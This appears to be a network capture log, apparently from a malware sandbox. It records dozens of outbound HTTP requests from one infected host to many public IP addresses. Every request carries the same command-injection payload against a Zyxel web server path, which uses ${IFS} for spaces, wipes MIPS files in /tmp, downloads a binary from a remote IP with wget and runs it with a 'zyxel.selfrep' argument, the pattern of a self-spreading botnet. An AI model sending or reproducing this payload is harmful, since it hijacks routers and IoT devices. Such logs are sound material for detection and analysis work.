                                                        Jan 28, 2024 10:13:00.556735039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6338192.168.2.1439160136.67.177.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556781054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6339192.168.2.1437008208.142.17.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556814909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6340192.168.2.1453166122.237.72.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556857109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6341192.168.2.1453784164.100.33.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556889057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6342192.168.2.144726663.167.155.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556909084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6343192.168.2.1438736118.170.89.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556962967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6344192.168.2.14411849.140.248.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557017088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6345192.168.2.1446686182.91.166.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557049036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6346192.168.2.1454874199.194.247.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557090044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6347192.168.2.1445580133.46.17.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557130098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6348192.168.2.1459262173.223.156.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557143927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6349192.168.2.14522121.147.228.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557172060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6350192.168.2.1432934151.249.234.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557212114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6351192.168.2.144740612.128.18.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557271004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6352192.168.2.1450216197.117.172.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557306051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6353192.168.2.1440684142.99.2.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557343960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6354192.168.2.1459286114.16.156.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557394028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6355192.168.2.145179268.156.177.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557400942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6356192.168.2.146076280.76.204.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557436943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6357192.168.2.1441952159.220.41.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557476997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6358192.168.2.144678499.35.170.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557533979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6359192.168.2.1443010154.142.244.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557579041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6360192.168.2.1437650138.66.107.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557600975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6361192.168.2.144960050.123.68.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557703018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6362192.168.2.1436812114.126.7.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557727098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6363192.168.2.14496145.112.39.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557776928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6364192.168.2.1451442125.117.119.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557780027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6365192.168.2.145382677.5.214.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557822943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6366192.168.2.1435046213.253.84.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557873011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6367192.168.2.1458702180.237.68.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557923079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6368192.168.2.1434492108.253.194.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.557957888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6369192.168.2.1453970179.98.40.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558001041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6370192.168.2.145032223.92.114.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558042049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6371192.168.2.143965295.79.118.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558070898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6372192.168.2.1460710220.179.216.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558110952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6373192.168.2.1440488219.4.101.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558150053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6374192.168.2.144590858.94.200.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558178902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6375192.168.2.145394035.166.159.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558206081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6376192.168.2.1452240111.136.218.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558243036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6377192.168.2.1459372108.175.74.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558279037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6378192.168.2.1443272195.139.78.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558296919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6379192.168.2.143914024.135.27.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558315992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6380192.168.2.1449794119.62.206.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558363914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6381192.168.2.1433664116.10.4.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558398008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6382192.168.2.1457742137.62.118.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558448076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6383192.168.2.1457608113.71.208.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558484077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6384192.168.2.145523852.48.90.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558523893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6385192.168.2.1460758119.126.60.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558546066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6386192.168.2.1448558182.124.2.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558573961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6387192.168.2.144739644.250.102.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558592081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6388192.168.2.145396497.67.213.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558634043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6389192.168.2.1433776204.222.155.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558667898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6390192.168.2.14495262.136.52.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558706045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6391192.168.2.1453648142.160.72.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558758020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6392192.168.2.1454528197.121.152.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558788061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6393192.168.2.1443704213.20.114.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558837891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6394192.168.2.144521280.80.145.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558870077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6395192.168.2.1442742221.183.239.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558902979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6396192.168.2.1454780143.130.125.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558954954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6397192.168.2.144922694.10.140.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.558991909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6398192.168.2.1454066202.233.182.89443
                                                        TimestampBytes transferredDirectionData
